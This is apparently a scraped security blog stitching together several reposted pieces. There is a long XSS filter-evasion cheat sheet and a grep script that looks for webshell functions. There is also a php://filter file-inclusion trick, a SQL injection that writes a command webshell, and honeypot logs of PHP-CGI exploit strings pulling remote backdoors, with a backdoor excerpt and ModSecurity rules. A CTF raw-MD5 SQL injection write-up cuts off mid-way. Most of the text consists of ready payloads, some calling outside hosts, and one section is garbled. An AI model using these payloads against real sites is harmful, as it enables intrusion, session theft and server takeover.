Created by Roman Ivanov

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

IMG STYLE with expression

This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:

exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

STYLE tag (Older versions of Netscape only)

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

STYLE tag using background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

STYLE tag using background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

Anonymous HTML with STYLE attribute

IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:

<XSS STYLE="xss:expression(alert('XSS'))">

Local htc file

This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

<XSS STYLE="behavior: url(xss.htc);">

US-ASCII encoding

US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.

¼script¾alert(¢XSS¢)¼/script¾

META

The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

META using data

Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

META with additional URL parameter

If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

IFRAME

If iframes are allowed there are a lot of other XSS problems as well:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

IFRAME Event based

IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

FRAME

Frames have the same sorts of XSS problems as iframes

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>


TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">

TD

Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

DIV

DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

DIV background-image with unicoded XSS exploit

This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

DIV background-image plus extra characters

Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

DIV expression

A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":

<DIV STYLE="width: expression(alert('XSS'));">

Downlevel-Hidden block

Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->

BASE tag

Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):

<BASE HREF="javascript:alert('XSS');//">

OBJECT tag

If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

 <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

Using an EMBED tag you can embed a Flash movie that contains XSS

Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:

EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
org/xss.swf" AllowScriptAccess="always"></EMBED>

You can EMBED SVG which can contain your XSS vector

This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Using ActionScript inside flash can obfuscate your XSS vector

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

XML data island with CDATA obfuscation

This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Locally hosted XML with embedded JavaScript that is generated using an XML data island

This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

HTML+TIME in XML

This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>


Assuming you can only fit in a few characters and it filters against ".js"

you can rename your JavaScript file to an image as an XSS vector:

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>


SSI (Server Side Includes)

This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->


PHP

Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>


IMG Embedded commands

This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">


IMG Embedded commands part II

This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser


Cookie manipulation

Admittidly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

UTF-7 encoding

If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:

 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

XSS using HTML quote encapsulation

This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild):

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

URL string evasion

Assuming "http://www.google.com/" is pro grammatically disallowed:

IP verses hostname

<A HREF="http://66.102.7.147/">XSS</A>

URL encoding

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

Dword encoding

(Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details):

<A HREF="http://1113982867/">XSS</A>

Hex encoding

The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

Octal encoding

Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

Mixed encoding

Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

=== Protocol resolution bypass === (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.

<A HREF="//www.google.com/">XSS</A>

Google "feeling lucky" part 1.

Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0.

<A HREF="//google">XSS</A>

Google "feeling lucky" part 2.

This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:

<A HREF="http://ha.ckers.org@google">XSS</A>

Google "feeling lucky" part 3.

This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):

<A HREF="http://google:ha.ckers.org">XSS</A>

Removing cnames

When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):

<A HREF="http://google.com/">XSS</A>

Extra dot for absolute DNS:

<A HREF="http://www.google.com./">XSS</A>

JavaScript link location:

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Content replace as attack vector

Assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera):

<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>

Character Encoding

All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

Character Encoding and IP Obfuscation Calculators

This following links include calculators for doing basic transformation functions that are useful for XSS.

Posted by k1rha
2012. 11. 29. 02:28


웹쉘 에사용되는 함수 점검하는 스크립트~ (Script, Finding using function in webshell) 


간단하게 짜보았는데, 단점은 result.txt 까지 검사를 한다.. 

result.txt 는 상위 폴더에 넣고 그폴더만 검색하도록 하는것을 권장! 


#!/bin/bash

echo "START"

grep -r -n "system(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' > result.txt

grep -r -n "execl(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "execve(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "fopen(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "passthru(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "exec(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "shell_exec(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

echo "create file \"result.txt\""

echo "FINISH"

Posted by k1rha
2012. 11. 26. 06:59

http://code.google.com/p/xe-core/source/browse/branches/1.5.3.2/modules/install/install.admin.controller.php?spec=svn12278&r=12278

Posted by k1rha
2012. 8. 13. 21:44

Using php://filter for local file inclusion

I came across a website where the site was vulnerable to LFI (local file inclusion) however the inclusion was done using a require_once and the script appended a .php extension to the end of the file; furthermore it was not vulnerable to null byte injection which meant that if I did include a file that:

  1. The file would have to be valid PHP syntax
  2. I would not be able to see anything contained between <? ?> tags
  3. Anything I could include would be executed.
  4. The file would have to end in the PHP extension

I tried to see if I could include remote files by specifying a URL as the parameter, sadlyallow_url_include was turned off so that failed. When I specified a valid PHP page it simply returned the normal page as expected.

The solution that allowed me to view the source of any PHP file was to use the functionphp://filter/convert.base64_encode/resource which has been available since PHP 5.0.0

1http://www.example.com/index.php?m=php://filter/convert.base64-encode/resource=index

This forces PHP to base64 encode the file before it is used in the require statement. From this point its a matter of then decoding the base64 string to obtain the source code for the PHP files. Simple yet effective..


Once you’ve got the source code for one file you can inspect it for further vulnerabilities such as SQL injections and additional PHP files referenced via include or require.

  • delicious
  • digg
  • facebook
  • linkedin
  • reddit
  • stumble
  • tumblr
  • twitter
This entry was posted in PHP and tagged . Bookmark the permalink.

3 Responses to Using php://filter for local file inclusion

  1. JOhn says:

    That’s pretty slick ;)

    I have a feeling that this can be prevented by using basename();

    1<?php
    2if(isset($_GET['m'])){
    3    $file basename($_GET['m']);
    4    require_once '$file';
    5}

    What are your thoughts on that?

    • Phil says:

      If you just use basename the strings going to end up as “resource=index.php”, checking to see if the file exists (using file_exists) is probably a safer method as it will return false for any php://filter files. A quick preg_match couldn’t hurt either…

      1if (preg_match("/^[A-Z0-9]+$/i"$_GET['m'])) {
      2    if (file_exists($_GET['m'])) {
      3        require_once($_GET['m']);
      4    }
      5}
  2. Frost says:

    Why not just have a white list array, even the `$_GET['m']` could produce unwanted results, and better to not leave it up to that.

    1$whiteList array('index' => 'index.php''about' =>'about.php');
    2if (in_array($_GET['m'], $whiteList)) {
    3      require_once($whiteList[$_GET['m']]);
    4}else {
    5      require_once($whiteList['index']);
    6}

    This way, you can easily default it, you know the files that will be included and you leave nothing up to chance. And, if you wanted to, you could name the names of the actual files different to prevent direct access.

Posted by k1rha
2012. 8. 12. 22:15

SQL injection 공격 과 방어의 원리 책들중...


UNION 구문과 INTO OUTFILE 을 이용하여 웹쉘 만들기


 1 UNION SELECT "<?system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/cmd.php" --



취약점 테스트로 좋은 구문


php?category=bikes
-> php?category=bi''kes

->php?category=bi'+'kes



패스워드 주석처리해 버리기(세미콜론이 먹힐때 )


select *from table where username='admin '/*'and passworkd='*/''; 



AND 나 OR 절 안쓰고 블라인드 하기 


where id =12/ (case+when+(ascii(substring(select+system_user),1,1))+>+64)+then+1+else+0+end)  //OK or error 


Posted by k1rha
2012. 8. 12. 22:09

sql injection awk 를 이용하여 빠르게 점검하기.


SQL injection 공격과 방어의 원리 책을 훑어 보다가 괜찮은 정검 방법


awk 이용하여 mysql_query 부분만 추출하여 세미콜론 확인하기.

 grep -r -n "mysql_query\(.*\)" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' > VLRN.txt



혹은 where 절만 보고싶을때 where 절만 추가


   grep -r -n "mysql_query\(.*\where.*\)" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' > VLRN.txt


이렇게하면 쿼리 구문중에 where 절이 들어간 것들은 전부다 나온다. 그중에 세미콜론처리가 잘 안된것 의주로 점검하면됨.





Posted by k1rha
2012. 8. 8. 21:58

http://ha.ckers.org/xss.html



http://www.youtube.com/watch?v=vgrxDZVApdI

Posted by k1rha
2012. 7. 19. 22:44

Honeypot Alert] (UPDATE) Active Exploit Attempts for PHP-CGI Vuln

UPDATE - we have received more exploit attempt details from web hosting provider DreamHost. Thanks goes to Robert Rowley for data sharing. Details below.

As you may have heard, some security researchers recently released information outlining a long standing vulnerability within the PHP-CGI code. The short of it is that remote attackers may be able to pass command line arguments in a query_string that will be passed directly to the PHP-CGI program. Ouch...

Exploit Attempts

Our web honeypots caught the following exploit attempts today:

37.112.127.136 - - [07/May/2012:02:36:11 +0400] "GET /?-s+%3d HTTP/1.1" 200 38 "-" "-"
37.112.127.136 - - [07/May/2012:02:36:12 +0400] "GET /?-d+auto_prepend_file=http://r00texp.narod2.ru/ows.txt HTTP/1.1" 200 38 "-" "-"
91.210.189.171 - - [07/May/2012:04:46:12 +0400] "GET /?-s HTTP/1.0" 200 6085 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
94.242.199.77 - - [07/May/2012:05:01:17 +0400] "GET /?-s HTTP/1.0" 200 6085 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
37.112.127.136 - - [07/May/2012:12:08:01 +0400] "GET /?-d+auto_prepend_file=http://r00texp.narod2.ru/ows.txt HTTP/1.0" 200 753 "-" "-"
37.112.127.136 - - [07/May/2012:12:08:01 +0400] "GET /?-s+%3d HTTP/1.0" 200 753 "-" "-"

Notice that while some of these are simply probes to see if the application might be vulnerable, there are also two RFI attempts to execute remote PHP code.

(UPDATE) DreamHost Exploit Attempt Details


Thanks for 태윤


파일 소스보기 

/index.php?-s 요렇게하면 소스가 딱


RFI 구문 

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi





DreamHost security provided SpiderLabs Research team with ModSecurity alert logs related to PHP-CGI Exploit attempts. These logs provide a much wider view of attack scale as DreamHost hosts more than 1,000,000 domains. Here are some stats:

  • Number of PHP-CGI Exploit Attempts: 234,076
  • Number of unique domains targeted: 151,275

Here are the top 10 attack vectors seen (with the # of attacks shown in the first column:

 198489 'GET /index.php?-s'
7837 'GET /blog/index.php?-s'
6078 'GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.5999mu.com/a.txt'
2075 'GET /index.php?-s/wp-admin/install.php'
1790 'GET /wordpress/index.php?-s'
1605 'GET /wp/index.php?-s'
862 'POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron'
670 'GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi'
534 'POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dphp:%2f%2finput'
422 'GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.qz0451.com/1.txt'

Goal - Webshells/Backdoors

One of the major goals of these attacks are to try and download/install webshells and backdoors. Let's look at one example shown above:

GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi

The remote RFI file is a PHP backdoor program. One of the more interesting aspects of this code is the following section of code where the attacker wants to prevent others from exploiting the same vulnerability:

if($backdoored > 0)
{
	echo chr(10)."{$backdoored} BACKDOOR_INSTALLED".chr(10);

	$htaccess = getcwd() . "/.htaccess";
	$htaccess_body = @file_get_contents($htaccess);

	$fp = fopen(".htaccess", "w+");	
	if($fp)
	{
		fwrite($fp, 

		'<IfModule mod_rewrite.c>'.chr(10).
		'RewriteEngine On'.chr(10).
		'RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]'.chr(10).
		'RewriteRule ^(.*) $1? [L]'.chr(10).
		'</IfModule>'. 

		str_repeat(chr(10), 5). 
		$htaccess_body
		);

		fclose($fp);
	}
	else
	{
		echo ".htaccess bugfix error!" . chr(10);
	}
}

The highlighted mod_rewrite rules will be added to .htaccess files as a crude method of patching the PHP-CGI vuln to prevent someone else from exploiting the same issue. The RewriteCond line will inspect the query_string to see if it starts with the dash character (-) and is not followed by the equal sign character (=). If this is true, meaning someone is attempting to exploit the vuln, then the final RewriteRule will capture the full REQUEST_URI will then add a question mark character (?) to the end and instruct mod_rewrite to treat the request as a symlink ([L]). Using mod_rewrite in this way should cause future attack to fail.

Mitigations

Due to the fact that attackers are actively probing for this vulnerability combined with PHP code fixes that may not be complete, you should consider deploying some security filters in the interim. There have been public posts outlining possible filters using mod_rewrite such as the following:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

This roughly translates to: if the query_string does not have an equal sign (=) and it does have a dash (-) then issue a Forbidden response. The problem with this filter is that it would not catch the RFI examples we captured with the web honeypots as they have an = sign when declaring the PHP "auto_prepend_file" function.

Trustwave SpiderLabs has developed the following ModSecurity rule that will catch all currently known exploit attempts:

SecRule QUERY_STRING "^-[sdcr]" "phase:1,t:none,t:urlDecodeUni,t:removeWhitespace,block,log,msg:'Potential PHP-CGI Exploit Attempt'"

This rule will check for the four most common PHP command line arguments coming directly after the question mark (?) character to start the query_string. It will apply a URL decode and remove whitespace characters.

Posted by k1rha
2012. 3. 21. 02:37

SQL injection with raw MD5 hashes (Leet More CTF 2010 injection 300)

Team Kernel Sanders t-shirts

The University of Florida Student Infosec Team competed in the Leet More CTF 2010 yesterday. It was a 24-hour challenge-based event sort of like DEFCON quals. Ian and I made the team some ridiculous Team Kernel Sanders shirts at our hackerspace just before the competition started. The good colonel vs. Lenin: FIGHT!

Here’s a walkthrough/writeup of one of the challenges.

Injection 300: SQL injection with raw MD5 hashes

One challenge at yesterday’s CTF was a seemingly-impossible SQL injection worth 300 points. The point of the challenge was to submit a password to a PHP script that would be hashed with MD5 before being used in a query. At first glance, the challenge looked impossible. Here’s the code that was running on the game server:

<?php
require "inc/mysql.inc.php";
?>
<html>
<head><title>Oh, Those Admins!</title></head>
<body><center><h1>Oh, hi!</h1>
<?php
if (isset($_GET['password'])) {
$r = mysql_query("SELECT login FROM admins WHERE password = '" . md5($_GET['password'], true) . "'");
if (mysql_num_rows($r) < 1)
echo "Oh, you shall not pass with that password, Stranger!";
else {
$row = mysql_fetch_assoc($r);
$login = $row['login'];
echo "Oh dear, hello <b>$login</b>!<br/><br/>Oh, and here's the list of all Admins!<table border=1><tr><td>Oh, login!</td><td>Oh, password!</td></tr>";
$r = mysql_query("SELECT * FROM admins");
while ($row = mysql_fetch_assoc($r))
echo "<tr><td>{$row['login']}</td><td>{$row['password']}</td></tr>";
echo "</table>";
}
} else {
?>
<form>Oh, give me your password, Admin!<br/><br/><input type='text' name='password' /><input type='submit' value='&raquo;' /></form>
<?php
}
?>
<br/><br/><small>Oh, &copy; 2010 vos!</small></center></body>
</html>
view rawindex.phpThis Gist brought to you by GitHub.

The only injection point was the first mysql_query(). Without the complication of MD5, the vulnerable line of code would have looked like this:

$r = mysql_query("SELECT login FROM admins WHERE password = '" . $_GET['password'] . "'");

If the password foobar were submitted to the script, this SQL statement would be executed on the server:

SELECT login FROM admins WHERE password = 'foobar'

That would have been trivial to exploit. I could have submitted the password ' OR 1 = 1; -- instead:

SELECT login FROM admins WHERE password = '' OR 1 = 1; -- '

…which would have returned all the rows from the admins table and tricked the script into granting me access to the page.

However, this challenge was much more difficult than that. Since PHP’s md5()function was encrypting the password first, this was what was being sent to the server :

SELECT login FROM admins WHERE password = '[output of md5 function]'

So how could I possibly inject SQL when MD5 would destroy whatever I supplied?

1337 hax0rs

The trick: Raw MD5 hashes are dangerous in SQL

The trick in this challenge was that PHP’s md5() function can return its output in either hex or raw form. Here’s md5()’s method signature:

string md5( string $str [, bool $raw_output = false] )

If the second argument to MD5 is true, it will return ugly raw bits instead of a nice hex string. Raw MD5 hashes are dangerous in SQL statements because they can contain characters with special meaning to MySQL. The raw data could, for example, contain quotes (' or ") that would allow SQL injection.

I used this fact to create a raw MD5 hash that contained SQL injection code.

But it might take years to calculate

In order to spend the least possible time brute forcing MD5 hashes, I tried to think of the shortest possible SQL injection. I came up with one only 6 characters long:

'||1;#

I quickly wrote a C program to see how fast I could brute force MD5. My netbook could compute about 500,000 MD5 hashes per second using libssl’s MD5 functions. My quick (and possibly wrong) math told me every hash had a 1 in 28 trillion chance of containing my desired 6-character injection string.

So that would only take 2 years at 500,000 hashes per second.

Optimizing: Shortening the injection string

If I could shorten my injection string by even one character, I would reduce the number of hash calculations by a factor of 256. After thinking about the problem for a while and playing around a lot with MySQL, I was able to shorten my injection to only 5 characters:

'||'1

This would produce an SQL statement like this (assuming my injection happened to fall in about the middle of the MD5 hash and pretending xxxx is random data):

SELECT login FROM admins WHERE password = 'xxx'||'1xxxxxxxx'

